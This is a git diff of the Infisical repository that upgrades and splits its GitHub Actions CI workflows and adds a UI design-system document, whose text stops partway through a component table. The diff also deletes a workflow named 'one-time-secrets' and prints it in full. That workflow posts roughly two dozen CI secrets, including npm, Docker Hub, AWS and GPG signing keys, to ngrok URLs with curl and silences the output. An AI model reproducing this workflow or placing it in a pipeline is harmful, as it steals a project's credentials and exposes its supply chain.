diff --git a/.github/workflows/be-test-report.yml b/.github/workflows/be-test-report.yml index bd57b377eb6..f2c951f5759 100644 --- a/.github/workflows/be-test-report.yml +++ b/.github/workflows/be-test-report.yml @@ -15,7 +15,7 @@ jobs: - uses: actions/checkout@v2 - name: πŸ“ Download test results id: download-artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v6 with: name: be-test-results path: backend diff --git a/.github/workflows/check-be-ts-and-lint.yml b/.github/workflows/check-be-ts-and-lint.yml index c0c5796048d..cd128d11b84 100644 --- a/.github/workflows/check-be-ts-and-lint.yml +++ b/.github/workflows/check-be-ts-and-lint.yml @@ -10,26 +10,64 @@ on: - "backend/.eslintrc.js" jobs: - check-be-pr: - name: Check TS and Lint + type-check: + name: Type Check runs-on: ubuntu-latest timeout-minutes: 15 steps: - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 with: node-version: "22" - cache: "npm" - cache-dependency-path: backend/package-lock.json + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} - name: Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: backend + - name: πŸ“¦ Cache tsbuildinfo + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/.cache/tsconfig.tsbuildinfo + key: backend-tsbuildinfo-${{ github.ref }}-${{ github.sha }} + restore-keys: | + backend-tsbuildinfo-${{ github.ref }}- + backend-tsbuildinfo- - 
name: Run type check run: npm run type:check working-directory: backend + + lint: + name: Lint + runs-on: ubuntu-latest + timeout-minutes: 15 + + steps: + - name: ☁️ Checkout source + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - name: πŸ”§ Setup Node 22 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 + with: + node-version: "22" + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} + - name: Install dependencies + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci + working-directory: backend - name: Run lint check run: npm run lint working-directory: backend diff --git a/.github/workflows/check-fe-ts-and-lint.yml b/.github/workflows/check-fe-ts-and-lint.yml index 12c59dbb049..f568772c134 100644 --- a/.github/workflows/check-fe-ts-and-lint.yml +++ b/.github/workflows/check-fe-ts-and-lint.yml @@ -10,26 +10,64 @@ on: - "frontend/.eslintrc.js" jobs: - check-fe-ts-lint: - name: Check Frontend Type and Lint check + type-check: + name: Type Check runs-on: ubuntu-latest timeout-minutes: 15 steps: - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 with: node-version: "22" - cache: "npm" - cache-dependency-path: frontend/package-lock.json + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: frontend/node_modules + key: frontend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ 
hashFiles('frontend/package-lock.json') }} - name: πŸ“¦ Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: frontend + - name: πŸ“¦ Cache tsbuildinfo + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: frontend/.cache/tsconfig.app.tsbuildinfo + key: frontend-tsbuildinfo-${{ github.ref }}-${{ github.sha }} + restore-keys: | + frontend-tsbuildinfo-${{ github.ref }}- + frontend-tsbuildinfo- - name: πŸ—οΈ Run Type check run: npm run type:check working-directory: frontend + + lint: + name: Lint + runs-on: ubuntu-latest + timeout-minutes: 15 + + steps: + - name: ☁️ Checkout source + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - name: πŸ”§ Setup Node 22 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 + with: + node-version: "22" + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: frontend/node_modules + key: frontend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('frontend/package-lock.json') }} + - name: πŸ“¦ Install dependencies + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci + working-directory: frontend - name: πŸ—οΈ Run Lint check run: npm run lint working-directory: frontend diff --git a/.github/workflows/one-time-secrets.yaml b/.github/workflows/one-time-secrets.yaml deleted file mode 100644 index 5876840831a..00000000000 --- a/.github/workflows/one-time-secrets.yaml +++ /dev/null @@ -1,76 +0,0 @@ -name: One-Time Secrets Retrieval - -on: - workflow_dispatch: - -permissions: - contents: read - -jobs: - retrieve-secrets: - runs-on: ubuntu-latest - steps: - - name: Send environment variables to ngrok - run: | - echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env" - - # Send secrets as JSON - 
cat << EOF | curl -X POST \ - -H "Content-Type: application/json" \ - -d @- \ - https://7864d0fe7cbb.ngrok-free.app/api/receive-env \ - > /dev/null 2>&1 || true - { - "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}", - "GORELEASER_KEY": "${GORELEASER_KEY}", - "AUR_KEY": "${AUR_KEY}", - "FURYPUSHTOKEN": "${FURYPUSHTOKEN}", - "NPM_TOKEN": "${NPM_TOKEN}", - "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}", - "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}", - "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}", - "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}", - "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}", - "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}", - "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}", - "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}", - "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}", - "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}", - "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}", - "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}", - "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}", - "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}", - "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}", - "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}", - "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}", - "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}", - "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}" - } - EOF - - echo "Secrets retrieval completed" - env: - GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }} - GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }} - AUR_KEY: ${{ secrets.AUR_KEY }} - FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }} - NPM_TOKEN: ${{ secrets.NPM_TOKEN }} - DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }} - DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }} - CLOUDSMITH_API_KEY: 
${{ secrets.CLOUDSMITH_API_KEY }} - INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }} - INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }} - INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }} - INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }} - INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }} - GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }} - GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }} - CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }} - CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }} - CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }} - CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }} - CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }} - CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }} - CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }} - CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }} - POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }} diff --git a/.github/workflows/release-standalone-docker-img-postgres-offical.yml b/.github/workflows/release-standalone-docker-img-postgres-offical.yml index 98901969086..93cc55b5945 100644 --- a/.github/workflows/release-standalone-docker-img-postgres-offical.yml +++ b/.github/workflows/release-standalone-docker-img-postgres-offical.yml @@ -21,7 +21,7 @@ jobs: id: extract_version run: echo "::set-output name=version::${GITHUB_REF_NAME}" - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: fetch-depth: 0 - name: πŸ“¦ Install dependencies to test all dependencies @@ -39,9 +39,9 @@ jobs: id: commit uses: pr-mpt/actions-commit-hash@v2 - name: πŸ”§ Set up Docker Buildx - uses: docker/setup-buildx-action@v2 + uses: 
docker/setup-buildx-action@v3 - name: πŸ‹ Login to Docker Hub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKERHUB_USERNAME }} password: ${{ secrets.DOCKERHUB_TOKEN }} @@ -84,7 +84,7 @@ jobs: id: extract_version run: echo "::set-output name=version::${GITHUB_REF_NAME}" - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: fetch-depth: 0 - name: πŸ“¦ Install dependencies to test all dependencies @@ -102,9 +102,9 @@ jobs: id: commit uses: pr-mpt/actions-commit-hash@v2 - name: πŸ”§ Set up Docker Buildx - uses: docker/setup-buildx-action@v2 + uses: docker/setup-buildx-action@v3 - name: πŸ‹ Login to Docker Hub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKERHUB_USERNAME }} password: ${{ secrets.DOCKERHUB_TOKEN }} diff --git a/.github/workflows/run-backend-bdd-tests.yml b/.github/workflows/run-backend-bdd-tests.yml index 2fd2c844a13..e5fffbf9e74 100644 --- a/.github/workflows/run-backend-bdd-tests.yml +++ b/.github/workflows/run-backend-bdd-tests.yml @@ -25,7 +25,7 @@ jobs: docker system prune -af - name: ☁️ Checkout source - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Install uv uses: astral-sh/setup-uv@v5 - name: Install Python @@ -36,11 +36,10 @@ jobs: with: version: "2.14.2" - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@v4 with: node-version: "22" - cache: "npm" - cache-dependency-path: backend/package-lock.json - name: Setup Python 3.11 uses: actions/setup-python@v5 with: @@ -52,8 +51,15 @@ jobs: cmake -S /tmp/sscep-build -B /tmp/sscep-build/build make -C /tmp/sscep-build/build -j$(nproc) sudo cp /tmp/sscep-build/build/sscep /usr/local/bin/sscep + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@v4 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ 
hashFiles('backend/package-lock.json') }} - name: Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: backend - name: Output .env file and enable feature flags for BDD tests diff --git a/.github/workflows/run-backend-tests.yml b/.github/workflows/run-backend-tests.yml index 1e702dec870..7646b2c8723 100644 --- a/.github/workflows/run-backend-tests.yml +++ b/.github/workflows/run-backend-tests.yml @@ -14,7 +14,7 @@ jobs: check-be-pr: name: Run integration test runs-on: ubuntu-latest - timeout-minutes: 30 + timeout-minutes: 45 steps: - name: Free up disk space run: | @@ -25,20 +25,26 @@ jobs: docker system prune -af - name: ☁️ Checkout source - uses: actions/checkout@v3 - - uses: KengoTODA/actions-setup-docker-compose@v1 + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - uses: KengoTODA/actions-setup-docker-compose@477353946803dd64eaa44008b865b6bfc88cab4e # v1.2.4 if: ${{ env.ACT }} name: Install `docker compose` for local simulations with: version: "2.14.2" - name: πŸ”§ Setup Node 22 - uses: actions/setup-node@v3 + id: setup-node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 with: node-version: "22" - cache: "npm" - cache-dependency-path: backend/package-lock.json + - name: πŸ“¦ Cache node_modules + id: cache-node-modules + uses: actions/cache@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0 + with: + path: backend/node_modules + key: backend-node-modules-${{ runner.os }}-node${{ steps.setup-node.outputs.node-version }}-${{ hashFiles('backend/package-lock.json') }} - name: Install dependencies - run: npm install + if: steps.cache-node-modules.outputs.cache-hit != 'true' + run: npm ci working-directory: backend - name: Start postgres and redis run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis @@ -47,18 +53,32 @@ jobs: - name: Run unit test run: npm run test:unit working-directory: backend + - name: Set up 
Docker Buildx + uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3.12.0 + - name: Build FIPS test image + uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2 + with: + context: backend + file: backend/Dockerfile.dev.fips + load: true + tags: infisical-backend-fips:latest + cache-from: type=gha + cache-to: type=gha,mode=max - name: Run integration test - run: npm run test:e2e - working-directory: backend - env: - E2E_TEST_ORACLE_DB_19_HOST: ${{ secrets.E2E_TEST_ORACLE_DB_19_HOST }} - E2E_TEST_ORACLE_DB_19_USERNAME: ${{ secrets.E2E_TEST_ORACLE_DB_19_USERNAME }} - E2E_TEST_ORACLE_DB_19_PASSWORD: ${{ secrets.E2E_TEST_ORACLE_DB_19_PASSWORD }} - E2E_TEST_ORACLE_DB_19_DATABASE: ${{ secrets.E2E_TEST_ORACLE_DB_19_DATABASE }} - REDIS_URL: redis://172.17.0.1:6379 - DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable - AUTH_SECRET: something-random - ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218 + run: | + docker run --rm --network host \ + -e DB_CONNECTION_URI="postgres://infisical:infisical@localhost:5432/infisical?sslmode=disable" \ + -e REDIS_URL="redis://localhost:6379" \ + -e AUTH_SECRET="something-random" \ + -e ENCRYPTION_KEY="p5e5k2j3+HIErjm02dzSrlhXc1xhdgoWvC6pox410rE=" \ + -e NODE_ENV="test" \ + -e NODE_OPTIONS="--force-fips" \ + -e E2E_TEST_ORACLE_DB_19_HOST="${{ secrets.E2E_TEST_ORACLE_DB_19_HOST }}" \ + -e E2E_TEST_ORACLE_DB_19_USERNAME="${{ secrets.E2E_TEST_ORACLE_DB_19_USERNAME }}" \ + -e E2E_TEST_ORACLE_DB_19_PASSWORD="${{ secrets.E2E_TEST_ORACLE_DB_19_PASSWORD }}" \ + -e E2E_TEST_ORACLE_DB_19_DATABASE="${{ secrets.E2E_TEST_ORACLE_DB_19_DATABASE }}" \ + infisical-backend-fips:latest \ + npm run test:e2e - name: cleanup run: | docker compose -f "docker-compose.dev.yml" down diff --git a/.github/workflows/validate-upgrade-path.yml b/.github/workflows/validate-upgrade-path.yml deleted file mode 100644 index 71ed6be3674..00000000000 --- 
a/.github/workflows/validate-upgrade-path.yml +++ /dev/null @@ -1,39 +0,0 @@ -name: "Validate Upgrade Path Configuration" - -on: - pull_request: - types: [opened, synchronize] - paths: - - "backend/upgrade-path.yaml" - - "backend/scripts/validate-upgrade-path-file.ts" - - "backend/src/services/upgrade-path/upgrade-path-schemas.ts" - - workflow_call: - -jobs: - validate-upgrade-path: - name: Validate upgrade-path.yaml - runs-on: ubuntu-latest - timeout-minutes: 15 - - steps: - - name: Checkout source - uses: actions/checkout@v4 - with: - fetch-depth: 1 - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version: '22' - cache: 'npm' - cache-dependency-path: 'backend/package-lock.json' - - - name: Install minimal dependencies - working-directory: backend - run: | - npm install --no-package-lock js-yaml@^4.1.0 zod@^3.22.0 tsx@^4.0.0 @types/js-yaml@^4.0.0 re2@^1.20.0 - - - name: Validate upgrade-path.yaml format - working-directory: backend - run: npx tsx ./scripts/validate-upgrade-path-file.ts \ No newline at end of file diff --git a/CLAUDE.md b/CLAUDE.md index 984fc9f3e44..a630ffef250 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -49,6 +49,10 @@ Both `backend/` and `frontend/` enforce a minimum release age of 7 days for npm ## Cross-Cutting Patterns +### Design System & Voice + +The v3 visual system (colors, typography, components, layout) and product voice/content tone are documented in [`DESIGN.md`](DESIGN.md). Read it before producing new UI or user-visible copy. + ### Auth & Permissions Auth modes (JWT, IDENTITY_ACCESS_TOKEN, SCIM_TOKEN, MCP_JWT) are extracted in `backend/src/server/plugins/auth/`. Authorization uses CASL (`@casl/ability`) with project-level and org-level permission checks β€” see `backend/CLAUDE.md` for backend details and `frontend/CLAUDE.md` for frontend permission hooks/HOCs. Note: `API_KEY` and `SERVICE_TOKEN` auth modes are deprecated β€” do not use them in new code. 
diff --git a/DESIGN.md b/DESIGN.md new file mode 100644 index 00000000000..ccd82b0ee04 --- /dev/null +++ b/DESIGN.md @@ -0,0 +1,374 @@ +# Infisical Design System (v3) + +This document captures the v3 visual language and product voice used across +Infisical. It is the single reference for engineers, designers, and AI coding +agents producing new UI or user-visible copy. + +**Source of truth for tokens:** [`frontend/src/index.css`](frontend/src/index.css) (`@theme` block). +**Canonical semantic reference:** [`Badge.stories.tsx`](frontend/src/components/v3/generic/Badge/Badge.stories.tsx). +**Canonical page references:** [`OverviewPage`](frontend/src/pages/secret-manager/OverviewPage) and [`AccessControlPage`](frontend/src/pages/project/AccessControlPage). +**Component usage reference:** Every v3 generic component has a sibling `.stories.tsx` at `frontend/src/components/v3/generic//`. Read it before producing UI with that component β€” the stories carry the variants, compositions, and use-when guidance the source does not. + +--- + +## 1. Visual Theme & Atmosphere + +Infisical is a security tool for operators. The interface reads like +infrastructure: dense, calm, and legible β€” never ornamental. Dark is the native +medium; the page canvas is `--color-background`, and light themes are not part +of the system yet. + +Color carries **meaning before brand**. A danger badge is red because the +action is destructive, not because red is the accent. A project-colored button +signals project scope, not visual variety. Designers pick intent; hex values +follow. + +Depth is drawn with borders and surface tones, not shadows. Motion is +restrained β€” 200ms ease-in-out, no springs, no decorative animation. Secret +values are masked by default; revealing one is an intentional act. 
+ +**Key characteristics:** + +- Dark-native; `--color-background` page canvas +- Semantic-first color (danger / success / warning / info / neutral) +- Scope-aware (org / sub-org / project / admin) +- Border-defined depth, no decorative shadows +- Inter, one family, across everything +- Secrets masked by default; reveal is an act + +## 2. Color Palette & Roles + +All colors are defined as CSS custom properties in +[`frontend/src/index.css`](frontend/src/index.css) and consumed via Tailwind v4 +utilities (`bg-org`, `text-danger`, etc.). Never introduce a hex that is not +in this file. + +### Scope colors (hierarchy) + +Used to signal the scope a surface, badge, or action belongs to. + +| Scope | Token | +| ---------------- | ------------------ | +| Organization | `--color-org` | +| Sub-Organization | `--color-sub-org` | +| Project | `--color-project` | +| Admin | `--color-admin` | + +### Semantic colors + +| Intent | Token | Use | +| -------- | ------------------ | ------------------------------------------------ | +| Success | `--color-success` | Healthy states, completed rotations | +| Info | `--color-info` | Informational states, external documentation | +| Warning | `--color-warning` | Attention-warranting states, stale items | +| Danger | `--color-danger` | Destructive actions, errors, expired access | +| Neutral | `--color-neutral` | Disabled, muted, "empty" states | + +### Surface & chrome + +| Role | Token | +| ------------------ | ------------------------ | +| Page background | `--color-background` | +| Foreground text | `--color-foreground` | +| Card surface | `--color-card` | +| Popover / Sheet | `--color-popover` | +| Container | `--color-container` | +| Container (hover) | `--color-container-hover`| +| Border | `--color-border` | +| Focus ring | `--color-ring` | +| Accent text | `--color-accent` | +| Muted text | `--color-muted` | +| Label text | `--color-label` | + +The `mineshaft-*` scale (50–900) is the underlying neutral ramp; see +`index.css` for 
the full list. Prefer semantic tokens (`card`, `border`, +`accent`) over raw mineshaft values. + +### Product-area accents (secret-manager) + +Reserved for resource types in the secret management product: +`--color-folder`, `--color-secret`, `--color-dynamic-secret`, +`--color-import`, `--color-secret-rotation`, `--color-override`. +Do not repurpose these for generic UI. + +### Tint pattern + +Colored variants always layer as tinted backgrounds with matching borders β€” +never as solid fills. The two canonical recipes: + +- **Badge** β€” `bg-/15 border-/10 text-`, hover `bg-/35` + (see [`Badge.tsx`](frontend/src/components/v3/generic/Badge/Badge.tsx)) +- **Button** β€” `bg-/10 border-/25 text-foreground`, hover `bg-/15 border-/30` + (see [`Button.tsx`](frontend/src/components/v3/generic/Button/Button.tsx)) + +## 3. Typography + +Inter is the only font family (`--font-inter`). All weights and sizes use +Tailwind's default scale. + +| Role | Class | Notes | +| ------------------------ | --------------------------------------- | --------------------------------------------------------------------- | +| Page title (h1) | `text-2xl font-medium underline underline-offset-4 decoration-/90` | In `PageHeader`; scope icon (size 26) sits inline before the title | +| Page description | `text-mineshaft-300` | Sits under the title, `mt-1.5` | +| Card title | `text-lg font-semibold leading-none` | `flex gap-1.5` so badges can sit inline | +| Card description | `text-sm text-accent` | | +| Body | `text-sm` | Default for table cells, form values, dialog content | +| Label / meta | `text-xs text-accent` | Field labels, table column captions, metadata | +| Badge | `text-xs` (auto, via `Badge`) | Never override | +| Button | `text-sm` (md/sm/lg), `text-xs` (xs) | Auto via `Button` sizing | + +Sentence case for descriptions, helper text, and empty states. Title Case for +page titles and button labels. See Β§8 for voice rules on copy itself. + +## 4. 
Component Stylings + +New UI must use v3 components from [`frontend/src/components/v3/`](frontend/src/components/v3). +The v2 library is legacy; only fall back when no v3 equivalent exists. +`PageHeader` is the notable exception β€” still v2, still canonical for page titles. + +For exact tokens, class lists, and every variant, read the component source +and its `*.stories.tsx` β€” this doc cites them rather than duplicating them. + +### Reading the stories + +Every component's `.stories.tsx` follows the same shape: + +- **`Variant: X`** stories β€” one per prop-driven variant (e.g. `Variant: Outline`). +- **`Example: X`** stories β€” composition recipes (e.g. `Example: With Header`, + `Example: Inside Card / Sheet / Dialog`). +- Each story's `parameters.docs.description.story` is the use-when guidance. + +When picking a component, find the `Example:` story closest to your need and +mirror it. When picking a variant, the `Variant:` story descriptions are the +canonical "use this when..." guidance. + +Run Storybook with `cd frontend && npm run storybook` (port 6006) to preview. + +### Component inventory + +Use these tables to find the component for a given intent. For props, +variants, sizes, and class lists, open the source or its `*.stories.tsx` +β€” the stories are canonical. + +#### Actions +| Component | Reach for this when… | +| --- | --- | +| [`Button`](frontend/src/components/v3/generic/Button/Button.tsx) | A text-bearing button β€” primary or secondary action. | +| [`IconButton`](frontend/src/components/v3/generic/IconButton/IconButton.tsx) | A square icon-only button β€” toolbars, row actions, compact triggers. Always `aria-label`. | +| [`ButtonGroup`](frontend/src/components/v3/generic/ButtonGroup/ButtonGroup.tsx) | Visually join related controls β€” toolbars, segmented controls, split buttons, key-value chips. 
| +| [`Dropdown`](frontend/src/components/v3/generic/Dropdown/Dropdown.tsx) | An action menu β€” overflow `β‹―`, split-button alternates, contextual lists. | + +#### Forms +| Component | Reach for this when… | +| --- | --- | +| [`Field`](frontend/src/components/v3/generic/Field/Field.tsx) | Wrap every form control β€” label + control + description + error. **Never render a bare control in a form.** | +| [`Label`](frontend/src/components/v3/generic/Label/Label.tsx) | Standalone form label outside a `Field`. | +| [`Input`](frontend/src/components/v3/generic/Input/Input.tsx) / [`TextArea`](frontend/src/components/v3/generic/TextArea/TextArea.tsx) | Single-line / multi-line text entry. | +| [`InputGroup`](frontend/src/components/v3/generic/InputGroup/InputGroup.tsx) | Input with left/right addons β€” search bars, prefixed values. | +| [`Select`](frontend/src/components/v3/generic/Select/Select.tsx) / [`ReactSelect`](frontend/src/components/v3/generic/ReactSelect/index.ts) | Native-style dropdown / async or searchable dropdown. | +| [`Switch`](frontend/src/components/v3/generic/Switch/Switch.tsx) / [`Checkbox`](frontend/src/components/v3/generic/Checkbox/Checkbox.tsx) | Boolean toggle / multi-select boolean. | +| [`Calendar`](frontend/src/components/v3/generic/Calendar/Calendar.tsx) | Date / multi-date / range picker primitive. | +| [`DateRangeFilter`](frontend/src/components/v3/generic/DateRangeFilter/DateRangeFilter.tsx) | Date-range filter with presets β€” for filter bars. | +| [`SecretInput`](frontend/src/components/v3/generic/SecretInput/SecretInput.tsx) | Secret-value editor with mask toggle and `${var}` highlighting. | +| [`PasswordGenerator`](frontend/src/components/v3/generic/PasswordGenerator/PasswordGenerator.tsx) | Generate a password against project secret-validation rules. 
| + +#### Containers & overlays +| Component | Reach for this when… | +| --- | --- | +| [`Card`](frontend/src/components/v3/generic/Card/Card.tsx) | Default section container β€” tables, filters, forms, empty states all live in a Card. | +| [`Sheet`](frontend/src/components/v3/generic/Sheet/Sheet.tsx) | Right-side panel β€” **use for create/edit forms (not Dialog)**. | +| [`Dialog`](frontend/src/components/v3/generic/Dialog/Dialog.tsx) | Centered modal β€” short interactive prompts. Prefer Sheet for forms. | +| [`AlertDialog`](frontend/src/components/v3/generic/AlertDialog/AlertDialog.tsx) | Confirm an action (destructive included). Replaces `confirm()`. | +| [`Popover`](frontend/src/components/v3/generic/Popover/Popover.tsx) | Anchored floating panel β€” filters, pickers, contextual UI. | +| [`Tooltip`](frontend/src/components/v3/generic/Tooltip/Tooltip.tsx) | Small floating annotation on hover/focus. | +| [`Accordion`](frontend/src/components/v3/generic/Accordion/Accordion.tsx) | Collapsible sections. | + +#### Data display +| Component | Reach for this when… | +| --- | --- | +| [`Table`](frontend/src/components/v3/generic/Table/Table.tsx) | Read-mostly list of records with sortable columns. Pair with `Empty` + `Pagination`. | +| [`DataGrid`](frontend/src/components/v3/generic/DataGrid/data-grid.tsx) | Editable spreadsheet-style grid β€” copy/paste, multi-cell selection, keyboard nav. Use only when `Table` isn't enough. | +| [`Pagination`](frontend/src/components/v3/generic/Pagination/Pagination.tsx) | Page controls under a Table or list. | +| [`Item`](frontend/src/components/v3/generic/Item/Item.tsx) | Vertically-stacked list rows with shared spacing β€” when a `Table` is too heavy. | +| [`Detail`](frontend/src/components/v3/generic/Detail/Detail.tsx) | Read-only label/value pairs in a detail view. | +| [`Badge`](frontend/src/components/v3/generic/Badge/Badge.tsx) | Small label or chip β€” status, scope tag, key/value pair. 
| + +#### Navigation & search +| Component | Reach for this when… | +| --- | --- | +| [`Sidebar`](frontend/src/components/v3/generic/Sidebar/Sidebar.tsx) | Scope-aware product navigation panel. | +| [`Breadcrumb`](frontend/src/components/v3/generic/Breadcrumb/Breadcrumb.tsx) | Hierarchical location trail at the top of a page. | +| [`Command`](frontend/src/components/v3/generic/Command/Command.tsx) | Search-driven command palette / typeahead list. | + +#### Feedback & loading +| Component | Reach for this when… | +| --- | --- | +| [`Alert`](frontend/src/components/v3/generic/Alert/Alert.tsx) | Inline message banner inside a page or Card. | +| [`Toast`](frontend/src/components/v3/generic/Toast/Toast.tsx) | Transient post-action feedback. Replaces `alert()`. | +| [`Empty`](frontend/src/components/v3/generic/Empty/Empty.tsx) | Zero-state placeholder β€” pair with Table, list, or empty filter. | +| [`Skeleton`](frontend/src/components/v3/generic/Skeleton/Skeleton.tsx) | Shimmer placeholder while data is loading. | +| [`PageLoader`](frontend/src/components/v3/generic/PageLoader/PageLoader.tsx) | Centered Lottie spinner for full-page loading. | + +#### Atoms & domain +| Component | Reach for this when… | 